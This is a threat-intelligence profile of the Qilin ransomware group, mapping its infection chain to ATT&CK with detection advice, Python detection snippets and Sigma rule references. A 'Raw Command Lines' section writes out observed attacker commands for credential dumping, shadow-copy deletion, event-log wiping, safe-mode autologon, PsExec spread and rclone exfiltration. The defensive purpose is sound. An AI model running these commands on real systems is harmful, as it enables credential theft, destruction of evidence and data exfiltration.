# Qilin Ransomware (Agenda / GOLD FEATHER / Phantom Mantis / Water Galura)

**Type:** Ransomware-as-a-Service (RaaS) - Open Affiliate Model

**Also tracked as:** Agenda (original name), GOLD FEATHER, Phantom Mantis (Group-IB), Water Galura (Trend Micro)

**First observed:** Mid-2022 (as "Agenda", written in Golang); rebranded to Qilin with a Rust rewrite in Sep 2022. Operator "Haise" advertised on the RAMP forum in Feb 2023.

**Status:** Active - **#1 most active RaaS operation in Q1 2026** with 342 victims (107 Jan, 104 Feb, 131 Mar). 1,000+ victims in 2025. Three consecutive months above 100 is unprecedented for any single group.

---

## Threat Overview

Open RaaS run by Russian-speaking operators and tolerated by the state (a CIS exclusion list is hardcoded in the binaries). Originally "Agenda" (Golang, 2022), rebranded to Qilin with a Rust rewrite in Sep 2022. Dual-track extortion: data exfiltration via Cyberduck/Rclone/WinSCP/MEGA, then encryption via a configurable Rust payload. Leak site on Tor and clearnet (WikiLeaksV2). Unique TTP: Chrome credential harvesting via a GPO logon script, with cascading impact beyond the original victim org.

| Field | Value |
|---|---|
| Ransom note | `README-RECOVER-<ext>.txt` or `<company_id>-RECOVER-README.txt` |
| File extension | Unique per victim (company ID), configurable by affiliate |
| Encryption | AES-256-CTR (with AES-NI) or ChaCha20; RSA-4096 OAEP for key wrapping |
| Encryption modes | fast, percent, normal, step-skip |
| Contact | Tor onion DLS, WikiLeaksV2 clearnet |
| Top targets (geo) | US (629), France (79), Canada (74) |
| Top targets (sector) | Manufacturing (198), Technology (140), Healthcare (134) |
| Cross-platform | Windows (Rust), Linux/ESXi (C-based), vCenter spread |
| Self-deletion | Yes - deletes payload post-encryption |

---

## Activity Standing

Dominant. Q1 2026: **Qilin (342)**, Akira (194), LockBit5, SafePay, Sinobi. No other group came close. Q1 2026 totaled 2,165 victims across the ecosystem; Qilin alone accounts for 15.8%.
Absorbed **RansomHub affiliates** after RansomHub went dark on April 1, 2025. Group-IB observed Qilin DLS disclosures doubling from February 2025 onward. Affiliate payout: 85% for ransoms above $3M, 80% at or below $3M. Payments go to affiliate wallets first, and the operator's share is transferred afterwards - standard trust-building for volume recruitment.

Notable affiliates: **Scattered Spider** (Octo Tempest), **Moonstone Sleet** (DPRK state actor, per Microsoft, Mar 2025), **FIN12/DEV-0237** (healthcare focus), Arkana Security, Devman.

2025 total: 1,000+ victims. Primary targets: Manufacturing (198), Technology (140), Healthcare (134). Geo: US (629), France (79), Canada (74).

---

## Initial Access

**Primary:** Stolen credentials - VPN, RDP, Citrix. Qilin affiliates are frequent IAB customers on RAMP, purchasing valid credentials for remote access gateways. Compromised VPN portals without MFA are a recurring theme.

**Secondary:** Vulnerability exploitation - FortiGate CVE-2024-21762 (out-of-bounds write, RCE) and CVE-2024-55591 (authentication bypass), SAP NetWeaver CVE-2025-31324, Veeam Backup CVE-2023-27532 (unauthenticated credential request).

**Tertiary:** ScreenConnect supply chain compromise (Jan 2025, tracked as STAC4365) - evilginx AitM phishing of MSP admins, intercepting MFA TOTP codes and granting super-admin access to downstream customer environments.

---

## Infection Chain

### Step 1 - Initial Access: Stolen Credentials / Exploitation

**ATT&CK:** T1078, T1133, T1190

The affiliate gains access via stolen VPN/RDP credentials (often purchased from IABs on RAMP) or exploitation of FortiGate CVE-2024-21762/CVE-2024-55591, SAP NetWeaver CVE-2025-31324, or Veeam CVE-2023-27532. In the Jan 2025 ScreenConnect campaign (STAC4365), an evilginx AitM phishing site intercepted MSP admin credentials and MFA TOTP codes, granting super-admin access to customer environments downstream. Dwell time from initial access to post-exploitation activity: 18 days observed in one case.
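One way to baseline VPN/RDP authentication logs for impossible travel, added here as an example that is not part of the original profile or of any vendor tooling. It assumes the gateway logins have already been enriched with a source geolocation; the `VpnLogin` field names, the 900 km/h plausibility threshold and the sample logins are all constructed assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from math import radians, sin, cos, asin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 900.0   # assumption: roughly airliner speed; tune per environment


@dataclass
class VpnLogin:
    """One successful gateway login, already enriched with a source geolocation."""
    ts: datetime
    user: str
    src_ip: str
    lat: float
    lon: float


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points."""
    dlat, dlon = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def impossible_travel(events):
    """Return (user, earlier_ip, later_ip, km) for each pair of consecutive logins
    by the same user whose implied ground speed exceeds MAX_PLAUSIBLE_KMH."""
    by_user = {}
    for e in sorted(events, key=lambda e: e.ts):
        by_user.setdefault(e.user, []).append(e)
    hits = []
    for user, logins in by_user.items():
        for prev, cur in zip(logins, logins[1:]):
            km = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            if km == 0:        # same place: never impossible, whatever the timing
                continue
            hours = (cur.ts - prev.ts).total_seconds() / 3600
            # Zero elapsed time with a non-zero distance is flagged outright,
            # which also avoids dividing by zero.
            if hours == 0 or km / hours > MAX_PLAUSIBLE_KMH:
                hits.append((user, prev.src_ip, cur.src_ip, round(km)))
    return hits


# Constructed sample: alice authenticates from Paris and 30 minutes later from
# New York; bob moves from London to Manchester over three hours (plausible).
T0 = datetime(2025, 3, 1, 8, 0)
SAMPLE = [
    VpnLogin(T0, "alice", "203.0.113.10", 48.86, 2.35),
    VpnLogin(T0 + timedelta(minutes=30), "alice", "198.51.100.7", 40.71, -74.01),
    VpnLogin(T0, "bob", "192.0.2.5", 51.51, -0.13),
    VpnLogin(T0 + timedelta(hours=3), "bob", "192.0.2.9", 53.48, -2.24),
]
```

Run `impossible_travel(SAMPLE)` to see alice's Paris-to-New York pair flagged while bob's London-to-Manchester move stays quiet.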
> **Detection Opportunity:** Credential-based initial access is inherently difficult to detect at the endpoint. Defenders should baseline VPN/RDP authentication logs for anomalous source geolocations, impossible travel, and authentication bursts, and correlate remote login events with known employee locations. This is a log source gap for organizations that do not ingest VPN auth logs into their SIEM.

### Step 2 - Reconnaissance

**ATT&CK:** T1087.002, T1016, T1018, T1033

Domain enumeration via `nltest`, `net group`, `Get-ADComputer`, and AdFind. Network scanning with masscan, Netscan, and Angry IP Scanner. Process/defense inspection via PCHunter64.exe and Powertool64.exe. Share enumeration via PowerView `Invoke-ShareFinder`.

> **Detection Opportunity:** Defenders should alert on rapid sequential execution of domain enumeration tools - `nltest.exe`, `net.exe`, `net1.exe`, `AdFind.exe`, and `netscan.exe` spawning within a short window from the same host. A single instance is noisy; a burst of three or more within minutes is high-fidelity. Additionally, monitor for `Invoke-ShareFinder` or equivalent PowerView modules loaded via PowerShell.
>
> See rule(s): [[edr-win-disc-net-priv-group-enum]] | [[edr-win-disc-nltest-domain-trusts]] | [[edr-win-disc-adfind-enum]]

### Step 3 - Credential Access

**ATT&CK:** T1003.001, T1555.003, T1112

The embedded Mimikatz module targets lsass.exe, winlogon.exe, and wininit.exe for token extraction. `!light.bat` sets WDigest `UseLogonCredential` to 1, forcing Windows to retain plaintext credentials in memory. Veeam CVE-2023-27532 exploitation dumps backup credentials.

**Chrome credential harvesting** via GPO logon script: a PowerShell script, `IPScanner.ps1`, was deployed to SYSVOL and executed on every user logon for 3 days, harvesting Chrome-stored passwords across the domain.
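The enumeration-tool burst logic from the Step 2 detection opportunity, added here as an example that is not part of the original profile or of the referenced Sigma rules. It runs over constructed Sysmon-style process-creation records in a `ts|host|image|commandline` layout; the 5-minute window, the three-distinct-tools threshold and the sample events are assumptions.

```python
from collections import deque
from datetime import datetime, timedelta

# Tools named in the Step 2 detection opportunity, as lowercase image basenames.
ENUM_TOOLS = {"nltest.exe", "net.exe", "net1.exe", "adfind.exe", "netscan.exe"}
WINDOW = timedelta(minutes=5)   # assumption: burst window
MIN_DISTINCT_TOOLS = 3          # assumption: distinct tools needed before alerting


def parse_event(line):
    """Parse one constructed 'ts|host|image|commandline' process-creation record."""
    ts, host, image, cmdline = line.split("|", 3)
    return datetime.fromisoformat(ts), host, image.rsplit("\\", 1)[-1].lower(), cmdline


def enumeration_bursts(lines):
    """Return {host: set(tools)} for hosts that ran MIN_DISTINCT_TOOLS or more distinct
    enumeration tools inside WINDOW. A lone nltest or net call is admin noise;
    the burst is the signal."""
    recent, alerts = {}, {}
    for ts, host, image, _ in sorted(map(parse_event, lines), key=lambda r: r[0]):
        if image not in ENUM_TOOLS:
            continue
        q = recent.setdefault(host, deque())
        q.append((ts, image))
        while ts - q[0][0] > WINDOW:    # drop events that fell out of the window
            q.popleft()
        tools = {tool for _, tool in q}
        if len(tools) >= MIN_DISTINCT_TOOLS:
            alerts.setdefault(host, set()).update(tools)
    return alerts


def sharefinder_hosts(lines):
    """Hosts where PowerShell was launched with PowerView's Invoke-ShareFinder."""
    return {host for _, host, image, cmd in map(parse_event, lines)
            if image in {"powershell.exe", "pwsh.exe"} and "invoke-sharefinder" in cmd.lower()}


# Constructed sample: WS01 runs four enumeration tools in three minutes and then
# PowerView; SRV02 runs single commands hours apart (normal admin noise).
SAMPLE = [
    r"2025-03-01T09:00:00|WS01|C:\Windows\System32\nltest.exe|nltest /dclist:",
    r'2025-03-01T09:00:40|WS01|C:\Windows\System32\net.exe|net group "Domain Admins" /domain',
    r'2025-03-01T09:01:10|WS01|C:\Windows\System32\net1.exe|net1 group "Domain Admins" /domain',
    r"2025-03-01T09:02:05|WS01|C:\Users\Public\AdFind.exe|AdFind.exe",
    r"2025-03-01T09:03:00|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r'powershell.exe -ep bypass -c "import-module .\ShareFinder.ps1 ; Invoke-ShareFinder"',
    r"2025-03-01T11:30:00|SRV02|C:\Windows\System32\nltest.exe|nltest /domain_trusts",
    r"2025-03-01T14:00:00|SRV02|C:\Windows\System32\net.exe|net use",
]
```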
> **Detection Opportunity:** Monitor for registry modifications setting `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential` to `1` - this forces plaintext credential storage and has no legitimate use on modern Windows. Also monitor for LSASS memory access patterns consistent with credential dumping (minidump-style access to lsass.exe). For the Chrome harvester, alert on PowerShell scripts executing from SYSVOL paths (`\\<DC>\SYSVOL\`), which indicates GPO-deployed code - rare in most environments and high-signal when it does occur.
>
> See rule: [[edr-win-cred-lsass-minidump]]

### Step 4 - Defense Evasion (BYOVD / EDR Killer)

**ATT&CK:** T1562.001, T1574.002, T1068

DLL sideloading: `msimg32.dll` loaded by a legitimate process. Two-stage loader: the first stage prepares the execution environment, neutralizes user-mode hooks, suppresses ETW logging, and conceals API calls. The second stage (the EDR killer) runs entirely in memory. It loads two vulnerable drivers: **rwdrv.sys** (renamed "ThrottleStop.sys") for physical memory access and **hlpdrv.sys** for process termination. It iterates a hardcoded list of 300+ EDR driver names, using physical memory writes via rwdrv.sys to unregister kernel monitoring callbacks (process creation, thread creation, image loading). The same drivers have been observed in Akira and Makop campaigns. Windows Defender is disabled and event logs are cleared via PowerShell.

> **Detection Opportunity:** Monitor for `msimg32.dll` being loaded from any path outside `System32` or `SysWOW64` - this is a known DLL sideloading vector shared across Qilin, Akira, and Makop. Alert on driver loads for `rwdrv.sys`, `hlpdrv.sys`, or `ThrottleStop.sys` - these are vulnerable drivers abused for physical memory access. Defenders should also monitor for bulk event log clearing: PowerShell enumerating all event logs via `Get-WinEvent -ListLog *` followed by `ClearLog()` calls is a near-certain indicator of anti-forensic activity.
>
> See rule: [[edr-win-def-defender-tampering]]

### Step 5 - Lateral Movement

**ATT&CK:** T1021.002, T1570, T1219

The `--spread` flag activates worm-like propagation: it deploys the embedded PsExec v2.43 to `%Temp%` under a random filename and spreads the payload across domain computers using operator-supplied credentials. The `MaxMpxCt` registry value is set to 65535 for the maximum number of concurrent SMB connections. Additional tools: WinRM, NetExec, RDP, ScreenConnect, AnyDesk, Chrome Remote Desktop. The `--spread-vcenter` variant targets ESXi: it disables HA/DRS on clusters, changes passwords, enables SSH, and uploads and executes the Linux payload.

> **Detection Opportunity:** Defenders should monitor for `cmd.exe` spawning with output redirected to `\\127.0.0.1\ADMIN$\` - this is Impacket WmiExec's signature pattern. Alert on PsExec-style remote service creation, especially when the executable is launched from `%Temp%` with a random filename. Watch for registry modifications setting `MaxMpxCt` to `65535` under `HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters` - no legitimate application sets SMB concurrent connections this high, and it is a strong indicator of ransomware propagation tuning. Also monitor for renamed Sysinternals utilities (PsExec with non-standard filenames).
>
> See rule(s): [[edr-win-lat-impacket-wmiexec]] | [[edr-win-lat-remote-psexec]]

### Step 6 - C2 and Persistence

**ATT&CK:** T1071.001, T1572

Cobalt Strike v4.x beacons with Malleable C2 (spoofed HTTP headers). SystemBC SOCKS5 proxy. SliverC2 observed in Pistachio Tempest operations. Known Cobalt Strike domains: `ikea0[.]com`, `lebondogicoin[.]com`. SystemBC C2: `93.115.25[.]139`. Additional RMM tools (AnyDesk, ScreenConnect, GoToDesk, QuickAssist) for persistence. Execution is gated by a SHA-256 hashed password argument.

> **Detection Opportunity:** Monitor for unauthorized RMM tool installations - AnyDesk, ScreenConnect, GoToDesk, and QuickAssist are frequently abused for persistence.
> Alert on multiple RMM tools installed on a single endpoint, or any RMM tool not on the organization's approved software list. For Cobalt Strike, monitor for named pipes, anomalous HTTP beaconing patterns, and process injection into `rundll32.exe` or `dllhost.exe`. DNS queries to known C2 domains are IOC-tier and will age out, but are worth blocking proactively.

### Step 7 - Exfiltration

**ATT&CK:** T1048, T1567.002

Cyberduck (primary in recent cases), Rclone, WinSCP, FileZilla, MEGA cloud storage. WinRAR for staging; exfiltration via easyupload[.]io observed. Volumes: 30 GB to 783 GB documented. Rclone is renamed to blend in with legitimate tools.

> **Detection Opportunity:** Defenders should monitor for Rclone execution regardless of binary name - look for the PE metadata and internal strings rather than the filename, since attackers routinely rename it. Alert on Cyberduck CLI execution (`cyberduck-cli`), which is increasingly preferred by Qilin affiliates over Rclone. Monitor for large outbound data transfers to cloud storage providers (S3, MEGA, easyupload.io). WinRAR staging large archives to a single directory followed by an outbound transfer is a common pre-exfil pattern.
>
> See rule: [[edr-win-exfil-rclone-usage]]

### Step 8 - Impact (Encryption)

**ATT&CK:** T1486, T1490, T1529

Ransomware binary (Rust) with configurable encryption: AES-256-CTR (on AES-NI systems) or ChaCha20, with RSA-4096 OAEP for key wrapping. Modes: fast, percent, normal, step-skip. VSS is deleted (`vssadmin delete shadows /all /quiet`) and the VSS service disabled (`wmic service ... ChangeStartMode Disabled`). The `--safe-mode` flag changes the user password, enables autologon via the Winlogon registry key, and reboots into safe mode so that encryption runs without EDR interference. Execution directory: `C:\PerfLogs` or `C:\temp` (binary named `w.exe` or `update.exe`). Self-deletes post-encryption. GPO-based deployment observed: a scheduled task via `run.bat` downloads and executes the payload. Ransom note: `README-RECOVER-<ext>.txt`.
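A small rule set covering the registry and command indicators from Steps 5 and 8 (`MaxMpxCt` tuning, VSS deletion and service disablement, the `bcdedit` safeboot switch, and the Winlogon `AutoAdminLogon`/`DefaultPassword` pair that precedes the safe-mode reboot), added here as an example that is not part of the original profile or of the referenced Sigma rules. The `ts|host|REG|key|value|data` and `ts|host|PROC|commandline` record layout, the 15-minute pairing window and the sample events are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

CORRELATION_WINDOW = timedelta(minutes=15)   # assumption: pairing window for Winlogon writes
# Registry keys named in the profile, lowercased for comparison.
LANMAN = r"hklm\system\currentcontrolset\services\lanmanserver\parameters"
WINLOGON = r"hklm\software\microsoft\windows nt\currentversion\winlogon"
COMMAND_RULES = [
    ("vss_shadow_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("vss_service_disabled", re.compile(r"wmic\s+service.*vss.*changestartmode\s+disabled", re.I)),
    ("safeboot_bcdedit", re.compile(r"bcdedit(\.exe)?\s+/set\b.*\bsafeboot\b", re.I)),
]


def parse(line):
    """Constructed record: 'ts|host|REG|key|value|data' or 'ts|host|PROC|commandline'."""
    ts, host, kind, rest = line.split("|", 3)
    if kind == "REG":
        key, value, data = rest.split("|", 2)
        return datetime.fromisoformat(ts), host, kind, (key.lower(), value.lower(), data)
    return datetime.fromisoformat(ts), host, kind, rest


def evaluate(lines):
    """Return (host, rule) alerts in time order. Command and registry rules fire per event;
    safe_mode_autologon_prep needs AutoAdminLogon=1 and a DefaultPassword write on the
    same host inside CORRELATION_WINDOW, in either order."""
    alerts, winlogon_seen = [], defaultdict(dict)   # host -> {value_name: ts}
    for ts, host, kind, payload in sorted(map(parse, lines), key=lambda r: r[0]):
        if kind == "PROC":
            alerts += [(host, name) for name, rx in COMMAND_RULES if rx.search(payload)]
            continue
        key, value, data = payload
        if key == LANMAN and value == "maxmpxct":
            alerts.append((host, f"smb_maxmpxct_set_{data}"))
        elif key == WINLOGON and value in ("autoadminlogon", "defaultpassword"):
            if value == "autoadminlogon" and data != "1":
                continue                 # switching autologon off is not the pattern
            winlogon_seen[host][value] = ts
            other = "defaultpassword" if value == "autoadminlogon" else "autoadminlogon"
            if other in winlogon_seen[host] and ts - winlogon_seen[host][other] <= CORRELATION_WINDOW:
                alerts.append((host, "safe_mode_autologon_prep"))
    return alerts


# Constructed sample: FS01 shows the pre-encryption sequence; WS07 only turns a kiosk's
# autologon off and must stay quiet.
SAMPLE = [
    r"2025-03-02T01:00:00|FS01|PROC|vssadmin.exe delete shadows /all /quiet",
    r"2025-03-02T01:00:05|FS01|PROC|wmic service where name='vss' call ChangeStartMode Disabled",
    r"2025-03-02T01:02:00|FS01|REG|HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters|MaxMpxCt|65535",
    r"2025-03-02T01:05:00|FS01|REG|HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|AutoAdminLogon|1",
    r"2025-03-02T01:05:02|FS01|REG|HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|DefaultPassword|<redacted>",
    r"2025-03-02T01:05:10|FS01|PROC|bcdedit /set {default} safeboot network",
    r"2025-03-02T03:00:00|WS07|REG|HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon|AutoAdminLogon|0",
]
```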
> **Detection Opportunity:** Alert on VSS deletion commands (`vssadmin delete shadows`) and on the VSS service being disabled - these are near-universal pre-encryption indicators. Monitor for safe-mode autologon preparation: writing `DefaultPassword` to `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon` combined with `AutoAdminLogon` set to `1` is almost always malicious. Watch for `bcdedit /set safeboot` commands. GPO-based ransomware deployment (scheduled tasks created via Group Policy) requires AD audit log visibility - verify that your environment ingests Group Policy change events.
>
> See rule: [[edr-win-impact-inhibit-recovery]]

---

## Raw Command Lines

Observed operator commands from IR reports and vendor analysis. `[R]` = reconstructed from described behavior.

**Reconnaissance**

```
nltest /dclist:
net group "Domain Admins" /domain
Get-ADComputer -Filter * -Properties Name | Select-Object Name
import-module .\ShareFinder.ps1 ; Invoke-ShareFinder -CheckShareAccess -Verbose
net use
```

**Credential access**

```
sekurlsa::logonpasswords
lsadump::sam
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f [R]
```

**Chrome credential harvesting (GPO logon script)**

```
IPScanner.ps1 [R]
logon.bat → powershell.exe -ep bypass -f \\<DC>\SYSVOL\<DOMAIN>\scripts\IPScanner.ps1 [R]
```

**VSS deletion and service manipulation**

```
vssadmin.exe delete shadows /all /quiet
wmic service where name='vss' call ChangeStartMode Disabled
net stop vss
```

**Event log clearing**

```
powershell $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}
```

**SMB tuning for propagation**

```
reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /t REG_DWORD /d 65535 /f [R]
```

**Symbolic link evaluation**

```
fsutil behavior set SymlinkEvaluation R2R:1
fsutil behavior set SymlinkEvaluation R2L:1
```

**Safe-mode autologon**

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f [R]
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d <USER> /f [R]
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d <PASS> /f [R]
bcdedit /set {default} safeboot network [R]
shutdown /r /t 0 [R]
```

**Lateral movement (--spread)**

```
<random>.exe \\<TARGET> -accepteula -u <DOMAIN>\<USER> -p <PASS> -s -d cmd.exe /c <PAYLOAD> [R]
```

**Exfiltration**

```
cyberduck-cli transfer <target_path> s3://<bucket> [R]
rclone copy \\<FILESERVER>\shares remote:exfil --transfers 16 --checkers 32 [R]
```

---

## Intelligence Gaps

- **Affiliate TTP divergence** - The open model, with Scattered Spider, DPRK actors, and ex-RansomHub affiliates, means TTPs will vary significantly per incident. No single canonical chain.
- **Chrome credential harvester scope** - Sophos documented one case (Jul 2024). Unknown whether this is a standard playbook item or one affiliate's innovation.
- **EDR killer driver list** - 300+ drivers targeted, but the full list has not been publicly released. Defenders cannot validate coverage against the kill list.
- **Linux/ESXi variant under-documented** - A C-based variant for ESXi exists, but there are limited public IR reports on the Linux chain.
- **GPO audit gap** - GPO-based ransomware deployment and the Chrome harvester both require AD audit logs. Organizations should verify ingestion of Group Policy change events in their SIEM.
- **Cyberduck exfil detection** - Increasingly preferred over Rclone in Qilin cases. Most detection stacks lack behavioral coverage for Cyberduck CLI.

---

## Confidence Assessment

| Claim | Confidence | Evidence | Flips if... |
|---|---|---|---|
| Russian-speaking operators | HIGH | CIS exclusion lists, RAMP forum activity, multiple vendor assessments | Affiliate misattributed as core |
| RansomHub affiliate absorption | HIGH | Group-IB, THN, timing correlation with April 2025 shutdown | Affiliates split to multiple RaaS |
| Moonstone Sleet (DPRK) affiliate | HIGH | Microsoft Threat Intelligence attribution (Mar 2025) | MSFT revises attribution |
| Scattered Spider affiliate | MEDIUM | Vendor reporting, shared TTPs | Overlap ≠ affiliation |
| #1 Q1 2026 by volume | HIGH | Ransomware.live, Breachsense, Purple Ops tracking | Data lag or duplicate counting |
| Chrome credential harvesting as standard TTP | LOW | Single Sophos case (Jul 2024) | Additional IR reports confirm |
| State-tolerated (not state-directed) | MEDIUM | CIS exclusion, no law enforcement action, forum posture | Direct state tasking evidence |

---

## Detections

Sigma rules applicable to this threat:

| Rule ID | Description |
|---|---|
| [[edr-win-disc-net-priv-group-enum]] | Privileged Domain Group Enumeration via Net |
| [[edr-win-disc-nltest-domain-trusts]] | Domain Trust Enumeration via Nltest |
| [[edr-win-disc-adfind-enum]] | AdFind LDAP Enumeration |
| [[edr-win-cred-lsass-minidump]] | LSASS Memory Dump via Comsvcs.dll |
| [[edr-win-cred-veeam-db-access]] | Veeam Backup Credential Database Access |
| [[edr-win-cred-reg-hive-dump]] | Registry Hive Credential Dump |
| [[edr-win-lat-impacket-wmiexec]] | Impacket WmiExec Lateral Movement |
| [[edr-win-lat-remote-psexec]] | Remote PsExec Service Execution |
| [[edr-win-exfil-rclone-usage]] | Rclone Data Exfiltration |
| [[edr-win-impact-inhibit-recovery]] | System Recovery Inhibition |
| [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell |
| [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution |

---

## Key Publications

1. [Cisco Talos - Qilin EDR Killer Infection Chain](https://blog.talosintelligence.com/qilin-edr-killer/) (Apr 2026)
2. [Cisco Talos - Uncovering Qilin Attack Methods](https://blog.talosintelligence.com/uncovering-qilin-attack-methods-exposed-through-multiple-cases/) (2025)
3. [Sophos - Qilin Stealing Chrome Credentials](https://www.sophos.com/en-us/blog/qilin-ransomware-caught-stealing-credentials-stored-in-google-chrome) (Aug 2024)
4. [Sophos - Qilin Affiliates Target ScreenConnect](https://www.sophos.com/en-us/blog/sophos-mdr-tracks-ongoing-campaign-by-qilin-affiliates-targeting-screenconnect) (Jan 2025)
5. [SANS - Evolution of Qilin RaaS](https://www.sans.org/blog/evolution-qilin-raas) (2025)
6. [FalconFeeds - Qilin Strategic Threat Assessment 2022-2026](https://falconfeeds.io/blogs/qilin-ransomware-cartel-strategic-threat-assessment-2022-2026) (2026)
7. [Check Point - Qilin/Agenda Deep Dive](https://www.checkpoint.com/cyber-hub/threat-prevention/ransomware/qilin-ransomware/) (2025)
8. [Barracuda - Qilin Surges into 2026](https://blog.barracuda.com/2026/01/15/qilin-ransomware-surges-into-2026) (Jan 2026)
9. [CIS - Qilin Top Threat to SLTTs Q2 2025](https://www.cisecurity.org/insights/blog/qilin-top-ransomware-threat-to-sltts-in-q2-2025) (2025)
10. [Halcyon - Qilin.B Enhanced Encryption](https://www.halcyon.ai/blog/new-qilin-b-ransomware-variant-boasts-enhanced-encryption-and-defense-evasion) (2024)
11. [Ransomware.live - Qilin Tracker](https://www.ransomware.live/group/qilin) (ongoing)
12. [Breachsense - March 2026 Ransomware Report](https://www.breachsense.com/ransomware-reports/march-2026/) (Mar 2026)